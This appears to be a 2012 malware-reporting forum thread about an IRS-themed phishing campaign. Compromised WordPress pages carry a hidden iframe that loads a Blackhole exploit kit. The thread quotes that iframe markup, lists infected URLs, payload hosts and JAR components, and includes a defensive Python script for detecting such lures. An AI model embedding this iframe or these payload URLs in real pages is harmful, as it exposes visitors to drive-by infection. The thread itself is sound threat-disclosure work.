'Rejected Tax transaction' rejrev.html malware

NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Mon Aug 13, 2012 4:45 pm

A criminal botnet is running a malware exploit that spoofs the (USA) IRS on webpages that link to a blackhole exploit kit in an iframe.

    <iframe src='http://immigrationunix.pro/main.php?page=28677a727aff0456' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

Here is a screenshot from one of the webpages.

Screenshot source: http://urlquery.net/screenshot.php?id=127541

Deceptive webpages are reported at

applesuniverse.com/wp-content/plugins/rejrev.html
juegosdebarbiemodamagicaenparis.org/wp-content/plugins/rejrev.html
kriskrohn.com/wp-content/plugins/rejrev.html
siddharthatrust.com/wp-content/plugins/rejrev.html

The "payload" site is

www.immigrationunix.pro/main.php?page=28677a727aff0456          network host: CYTA HELLAS (AS6866)

Its components include

www.immigrationunix.pro/Sf.jar          (see http://www.virustotal.com/file/2add9c3d ... 344873933/ )
www.immigrationunix.pro/data/Qai.jar    (see http://www.virustotal.com/file/1f13223c ... 344874078/ )
www.immigrationunix.pro/data/Pol.jar    (see http://www.virustotal.com/file/f76ac698 ... 344874248/ )

NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Mon Aug 13, 2012 6:18 pm

associatedarborists.com/wp-content/plugins/rejrev.html
aveaturkcellvodafonesohbet.tk/wp-content/plugins/rejrev.html
fashclothingtoday.com/wp-content/plugins/rejrev.html
khmerfreedom.org/wp-content/plugins/rejrev.html
suitesmasferrer.com/wp-content/plugins/rejrev.html
tandemskydiving.net/wp-content/plugins/rejrev.html

NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Mon Aug 13, 2012 7:06 pm

transport24.dk/wp-content/plugins/rejrev.html

batmonkeyman
Posts: 1
Joined: Mon Aug 13, 2012 7:19 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by batmonkeyman » Mon Aug 13, 2012 7:19 pm

planetaryhealings.com/wp-content/plugins/rejrev.html

Jazspeak
Posts: 3711
Joined: Fri Oct 17, 2008 4:20 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by Jazspeak » Mon Aug 13, 2012 7:54 pm

Interesting but what is the malware supposed to do?

The screenshot doesn't look like an IRS page, so I can't imagine that any but the most ignorant would be fooled into thinking that the page has anything to do with the IRS. Does seeing the page loaded mean that it is too late, or is there some other action required by the recipient for the machine to be infected?

NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Mon Aug 13, 2012 8:07 pm

360myte.com/wp-content/plugins/rejrev.html
guadeloupe-gites.net/wp-content/plugins/rejrev.html


NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by NotBuyingIt » Tue Aug 14, 2012 4:29 am

Jazspeak wrote:

    The screenshot doesn't look like an IRS page, so I can't imagine that any but the most ignorant would be fooled into thinking that the page has anything to do with the IRS.

I saw the text of a scam email message that was accidentally (I assume) sent to a list server. The email message contains a paragraph that reads:

    Rejected Tax transaction Tax Transaction ID: 64930803539660 Reason of rejection See details in the report below <a href="#prey_com_mx">Tax Transaction Report tax_report_64930803539660.doc</a> (Microsoft Word Document)

Instead of linking to a DOC file, the deceptive URL is actually

hXXp://prey.com.mx/wp-content/plugins/rejrev.html    (screenshot: http://urlquery.net/screenshot.php?id=1 ... )

The webpage at rejrev.html contains an iFrame that attempts to load

hXXp://milestonedetected.pro/main.php?page=28677a727aff0456

The domain milestonedetected.pro was created on 13-Aug-2012 and suspended later the same day.

According to urlquery.net (report), prey.com.mx hosts a BlackHole exploit kit (Wikipedia). Such a kit may be capable of drive-by downloads or installs (Wikipedia), in addition to whatever wickedness lurked at milestonedetected.pro.
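The two tricks this thread documents, the hidden iframe in the first post that loads the exploit-kit landing page and the email anchor whose visible text promises a .doc while its href points at rejrev.html, can both be flagged by a small HTML triage script. The following is an added example written for this thread, not code posted by anyone here: the sample page and email markup are constructed to resemble what is quoted above (the URLs are the ones the thread reports), and the 20-pixel size threshold for "tiny" iframes is an arbitrary assumption.

```python
"""Triage helper for HTML of the kind quoted in this thread.

Flags (1) iframes that are invisible or tiny, as the exploit-kit loader
iframe above is, and (2) anchors whose link text names a document
(.doc/.docx/.xls/.xlsx/.pdf/.zip) while the href path ends elsewhere.
Constructed example; not code from the original posts.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample resembling the injected iframe quoted in the thread,
# plus one ordinary (visible) embed that must not be flagged.
SAMPLE_PAGE = """<html><body><p>Loading...</p>
<iframe src='http://immigrationunix.pro/main.php?page=28677a727aff0456'
 width='10' height='10'
 style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
<iframe src='https://www.youtube.com/embed/abc' width='560' height='315'></iframe>
</body></html>"""

# Constructed sample resembling the scam email body quoted in the thread,
# plus one honest link whose text and href agree.
SAMPLE_EMAIL = """<p>Rejected Tax transaction Tax Transaction ID: 64930803539660</p>
<a href="http://prey.com.mx/wp-content/plugins/rejrev.html">Tax Transaction Report tax_report_64930803539660.doc</a>
(Microsoft Word Document)
<a href="https://example.org/report.pdf">report.pdf</a>"""

DOC_EXT = re.compile(r"\.(docx?|xlsx?|pdf|zip)\b", re.I)
TINY_PX = 20  # assumption: anything this small or smaller is not meant to be seen


def parse_style(style):
    """Turn 'a:b;c:d' into a lower-cased dict of CSS declarations."""
    out = {}
    for decl in style.split(";"):
        if ":" in decl:
            key, val = decl.split(":", 1)
            out[key.strip().lower()] = val.strip().lower()
    return out


def iframe_is_hidden(attrs):
    """True if the iframe is invisible via CSS or has tiny width and height."""
    a = dict(attrs)
    style = parse_style(a.get("style") or "")

    def small(dim):
        try:
            return int(re.sub(r"px$", "", a.get(dim) or "100")) <= TINY_PX
        except ValueError:  # percentages or junk: do not treat as tiny
            return False

    return (style.get("visibility") == "hidden"
            or style.get("display") == "none"
            or (small("width") and small("height")))


class Triage(HTMLParser):
    """Collects (kind, url) findings while streaming through the markup."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._href = None   # href of the <a> currently open, if any
        self._text = []     # text fragments seen inside that <a>

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            if iframe_is_hidden(attrs):
                self.findings.append(("hidden_iframe", dict(attrs).get("src") or ""))
        elif tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            text = "".join(self._text).strip()
            claimed = DOC_EXT.search(text)
            path = urlparse(self._href).path.lower()
            # Link text advertises a document, but the target path does not
            # carry that extension: the pattern used by the rejrev.html lure.
            if claimed and not path.endswith(claimed.group(0).lower()):
                self.findings.append(("deceptive_link", self._href))
            self._href = None


def triage(html):
    """Return a list of (kind, url) findings for the given HTML string."""
    parser = Triage()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for label, sample in (("page", SAMPLE_PAGE), ("email", SAMPLE_EMAIL)):
        for kind, url in triage(sample):
            print(f"{label}: {kind} -> {url}")
```

Run it as-is to see one hidden-iframe finding for the page sample and one deceptive-link finding for the email sample; pointing `triage()` at saved mail bodies or fetched landing pages gives a cheap first pass before anything is opened in a browser.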



Jazspeak
Posts: 3711
Joined: Fri Oct 17, 2008 4:20 pm

RE: 'Rejected Tax transaction' rejrev.html malware

Post by Jazspeak » Tue Aug 14, 2012 8:44 am

NotBuyingIt wrote:

    "...the text of a scam email message that was...sent to a list server."

Ah, now I understand. Thanks for clearing that up.

NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' irsrev.html malware

Post by NotBuyingIt » Tue Aug 14, 2012 4:27 pm

daoyour.com/irsrev.html
ny.entertainmen.se/irsrev.html
stoneplus.cn/irsrev.html
uaebusinesscentre.com/irsrev.html

roadshandhelds.info/main.php?page=39630332cf486f5a    network host: Cyprus Telecommunications Authority (AS6866)
roadshandhelds.info/data/Qai.jar    (see http://www.virustotal.com/file/1f13223c ... 344960998/ )
roadshandhelds.info/data/Pol.jar    (see http://www.virustotal.com/file/f76ac698 ... 344961108/ )

NotBuyingIt
Posts: 3285
Joined: Fri Mar 11, 2011 6:21 pm

RE: 'Rejected Tax transaction' irsrev.html malware

Post by NotBuyingIt » Tue Aug 14, 2012 5:19 pm

88836950.cn/irsrev.html
ebh888.com/irsrev.html
ferdielektronik.com/irsrev.html
fxwg315.com/irsrev.html
xn--materiay-budowlane-szczyrk-4je.pl/irsrev.html
sovei.com.cn/irsrev.html
webandgraphicsolutions.com/irsrev.html

wireframeglee.info/main.php?page=39630332cf486f5a    network host: Cyprus Telecommunications Authority (AS6866)
wireframeglee.info/data/Qai.jar    (see http://www.virustotal.com/file/1f13223c ... 344963587/ )
wireframeglee.info/data/Pol.jar    (see http://www.virustotal.com/file/f76ac698 ... 344963673/ )
